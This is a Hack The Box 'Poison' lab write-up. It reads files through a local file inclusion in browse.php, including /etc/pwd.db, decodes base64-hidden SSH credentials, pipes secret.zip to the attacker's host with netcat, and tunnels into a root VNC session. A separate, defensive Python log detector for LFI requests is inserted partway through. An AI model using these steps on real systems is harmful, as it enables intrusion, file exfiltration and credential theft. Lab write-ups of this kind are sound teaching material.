HTB – Poison – 10.10.10.84


This is another one I intend to “rewrite”, but posting here so I can get to work on it later this week. 

Run nmap:

root@kali:~# nmap -v -p 1-65535 -sV -O -sS -T4 10.10.10.84

This scan prints verbose output (-v), runs a stealth SYN scan (-sS) with T4 timing (faster), does OS and version detection (-O, -sV), and covers the full port range (-p 1-65535).

The results of this scan show two open ports; all other ports are closed. The open ports are:

22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)

80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)

It’s a web server, so let’s visit the webpage.

It leads us to a “temporary website” that someone has created to test local .php scripts.

My initial instinct is to try all of these scripts and see what sticks out…

info.php:

FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017

root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64

listfiles.php:

Array ( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt )

So, this shows some files that aren’t listed on the front page. Especially interesting is pwdbackup.txt.

phpinfo.php shows the build information for PHP version 5.6.32.

I want to look further at pwdbackup.txt. I enter that into the scriptname field and get the following output:

(screenshot Poison1.png: output of pwdbackup.txt)

What could go wrong, indeed!

I ran this through a Base64 decoder 13 times and received the password Charix!2#4%6&8(0. I'm assuming Charix is the username, and step 5 will confirm that.

ssh charix@10.10.10.84

Entered the password, cat user.txt, done.

I also noticed that this web address seems vulnerable to a local file inclusion (LFI) vulnerability. The use of file= suggests I can probably access files other than just those listed. I know the OS is FreeBSD, and a quick Google search turns up that the passwd file in FreeBSD is actually /etc/pwd.db, not /etc/passwd. I try a few variations of ../../etc/pwd.db, but it turns out that all I need to access this file is “file=/etc/pwd.db”.
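As an added example (not part of the original writeup), here is a small Python detector a defender could run over Apache access logs to flag the kind of file= requests described above: traversal sequences, absolute paths, and reads of the FreeBSD password databases. The log lines are constructed for the example, and the watch list of sensitive paths is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed watch list: FreeBSD password databases a file= parameter should never reach.
SENSITIVE_PATHS = ("/etc/pwd.db", "/etc/spwd.db", "/etc/master.passwd", "/etc/passwd")

# Apache combined/common log prefix: client, ident, user, [timestamp], "METHOD URL PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines mirroring the requests discussed in the writeup.
SAMPLE_LOG = [
    '10.10.14.13 - - [01/Jan/2024:10:00:00 +0000] "GET /browse.php?file=ini.php HTTP/1.1" 200 512',
    '10.10.14.13 - - [01/Jan/2024:10:00:05 +0000] "GET /browse.php?file=../../etc/pwd.db HTTP/1.1" 200 40960',
    '10.10.14.13 - - [01/Jan/2024:10:00:09 +0000] "GET /browse.php?file=/etc/pwd.db HTTP/1.1" 200 40960',
    '10.10.14.13 - - [01/Jan/2024:10:00:15 +0000] "GET /browse.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1024',
    '10.10.14.20 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 2048',
]


def classify_file_param(value):
    """Return a reason string if a file= value looks like LFI abuse, else None."""
    # parse_qs already decoded once; decode again to catch double-encoded (%252e) payloads.
    decoded = unquote(value)
    if "\x00" in decoded:
        return "null-byte"
    if re.search(r"\.\.[\\/]", decoded):
        return "traversal"
    if decoded.startswith("/"):
        if any(decoded.endswith(p) for p in SENSITIVE_PATHS):
            return "sensitive-file"
        return "absolute-path"
    return None


def scan_access_log(lines):
    """Return a list of (client_ip, decoded_file_value, reason) for suspicious file= requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line; skip rather than guess
        query = parse_qs(urlsplit(m.group("url")).query, keep_blank_values=True)
        for raw in query.get("file", []):
            reason = classify_file_param(raw)
            if reason:
                hits.append((m.group("ip"), unquote(raw), reason))
    return hits


if __name__ == "__main__":
    for ip, path, reason in scan_access_log(SAMPLE_LOG):
        print(f"{ip} requested file={path!r} ({reason})")
```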

There is also a secret.zip file on the desktop that is password protected. I need to transfer it to my attack machine in order to crack it.

On my attack machine:

nc -l -p 1234 > secret.zip

This creates a file for the transfer to dump into.

On the victim machine:

nc -w 3 10.10.14.13 1234 < secret.zip

I’m going to attempt to crack the password with fcrackzip.

secret.zip doesn't have a crazy password to crack. Just use Charix's password.

VNC is running on the server.

SSH tunnelling to connect:
root@Kali:~# ssh -L 5901:localhost:5901 charix@10.10.10.84

Using the VNC GUI doesn't work; instead use (in another terminal):
root@Kali:~# vncviewer 127.0.0.1:5901 -passwd /root/Desktop/htb/poison/secret

Port 5902 would have been Charix's desktop (the display name Poison:2 suggests that). Port 5901 is the other VNC instance running, which is root.
